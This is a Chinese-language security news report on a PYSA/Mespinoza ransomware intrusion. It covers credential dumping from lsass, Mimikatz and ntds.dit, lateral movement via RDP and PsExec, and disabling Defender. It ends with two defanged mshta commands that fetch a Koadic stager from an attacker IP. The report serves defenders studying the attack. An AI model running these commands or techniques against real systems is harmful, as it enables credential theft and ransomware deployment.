【安全资讯】PYSA/Mespinozaler勒索软件，使用了Empire和Koadic以及RDP实现横向渗透

  Mespinoza勒索软件的攻击者使用了Empire和Koadic以及RDP实现横向渗透，并在达到目标的过程中从尽可能多的系统中获取了凭据。在所有系统上执行勒索软件之前，攻击者花了很多时间来寻找文件并检查备份服务器。

在入侵期间，我们看到PYSA威胁参与者尝试通过以下技术来访问凭据：
    使用Taskmanager转储lsass
    用Procdump转储lsass
    使用comsvcs.dll转储lsass
    使用Invoke-Mimikatz转储凭证
    从域控制器中提取ntds.dit的卷影副本
    从SQL数据库提取和解码备份系统凭据
    访问LSA机密

环境中的大多数横向移动是通过具有各种合法用户帐户的RDP，以及通过PsExec在整个环境中执行脚本进行凭据转储和收集活动。

攻击者通过使用本地安全策略编辑器和MpPreference禁用Defender安全工具。还使用PowerShell Remoting在一些系统上运行arp命令。

在初始访问大约7个小时之后，攻击者开始了最终行动，方法是将RDP部署到系统中，然后删除PowerShell脚本和勒索软件可执行文件。PowerShell脚本杀死了各种活动进程，并确保在防火墙处打开了RDP，并创建了看起来是系统唯一标识符的对象。之后，将对系统进行加密，加密完成后，攻击者要求提供5个BTC或大约88,000美元的赎金，这告诉我们攻击者可能是根据泄露的信息来要求赎金的。

入侵后期，威胁行动者雇用了另一个名为Koadic的OST 。为了执行Koadic，他们使用了带有JavaScript的MSHTA启动器。

    mshta http://45.147.231[.]210:9999/8k6Mq

  mshta http://45.147.231[.]210:9999/VtgyT

从这两个执行中，创建了各种子进程以将阶段2加载到内存中。